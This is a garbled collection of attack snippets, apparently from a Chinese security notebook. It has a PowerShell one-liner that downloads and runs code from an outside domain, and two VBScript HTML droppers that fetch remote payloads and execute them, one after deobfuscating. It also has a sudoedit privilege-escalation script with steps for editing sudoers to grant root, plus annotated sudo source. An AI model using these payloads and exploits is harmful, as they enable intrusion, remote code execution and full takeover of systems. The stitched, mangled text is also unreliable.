I E X ( N e w - O b j e c t N e t . W e b c l i e n t ) . d o w n l o a d s t r i n g ( " h t t p : / / e d u c a t i o l i n k . c o m / i n d e x . p h p " )
<html> <scriptlanguage="vbscript"> On Error Resume Next Set Posto = CreateObject("MSXML2.ServerXMLHTTP.6.0") Posto.open "GET", "baidu.com", False ' http://hpurusymireene.com/theme/basic/skin/member/basic/upload/eweerew.php?er=1 Posto.send to = Posto.responseText Execute(to) </script> </html>
<html> <!--一个简单的子序列拼接函数--> <!--输入'123456789abcdefghiklm'--> <!--输出''1a2b3c4d5e6f7g8h9iklm''--> <scriptlanguage="vbscript"> On Error Resume Next
Function cooo(c) L = Len(c) s = "" d = 9 For jx = 0 To d - 1 For ix = 0 To Int(L/d) - 1 s = s & Mid(c, ix*d+jx+1, 1) Next Next s = s & Right(c, L - Int(L/d) * d) cooo = s End Function
Set Posto = CreateObject("MSXML2.ServerXMLHTTP.6.0") Posto.open "GET", "baidu.com", False ' https://christinadudley.com/public_html/edudley/sites/default/files/1203427/expres.php?op=1 Posto.send to = Posto.responseText to = cooo(to) Execute(to) </script> </html>
if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$' then echo"> Currently installed sudo version is not vulnerable" exit 1 fi #判断sudoers里有无test ALL=(ALL:ALL) sudoedit EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)
if [ -z "$EXPLOITABLE" ]; then echo"> It doesn't seem that this user can run sudoedit as root" read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2 else echo"> BINGO! User exploitable" fi
echo"> Opening sudoers file, please add the following line to the file in order to do the privesc:" echo"$USER ALL=(ALL:ALL) ALL" read -n 1 -s -r -p "Press any key to continue..." echo"$EXPLOITABLE" #下面的payload实际上是EDITOR="vim -- /etc/sudoers" sudoedit EDITOR="vim -- /etc/sudoers"$EXPLOITABLE sudo su root exit 0
2.在上面的exp运行时,按两下回车,会自动打开sudoers的编辑界面。
1 2 3 4 5
将之前的 test ALL=(ALL:ALL) sudoedit 改为--> test ALL=(ALL:ALL) ALL 保存退出
// src/sudo_edit.c@sudo_edit() int sudo_edit(struct command_details *command_details) { // [...] /* * Set real, effective and saved uids to root. * We will change the euid as needed below. */ //设置了ROOT权限和临时可写目录 setuid(ROOT_UID); // [...] /* Find a temporary directory writable by the user. */ set_tmpdir(&user_details.cred); // [...] /* * The user's editor must be separated from the files to be * edited by a "--" option. */ //argv[]={'vim','--','/etc/sudoers','--','/etc/custom_test.txt'} for (ap = command_details->argv; *ap != NULL; ap++) { if (files) nfiles++; //命令行参数与--比较,如果相同则将下一个内容视为要编辑的文件名 elseif (strcmp(*ap, "--") == 0) files = ap + 1; else editor_argc++; }
/* * We use "--" to separate the editor and arguments from the files * to edit. The editor arguments themselves may not contain "--". */ if (strcmp(nargv[nargc], "--") == 0) { sudo_warnx(U_("ignoring editor: %.*s"), (int)edlen, ed);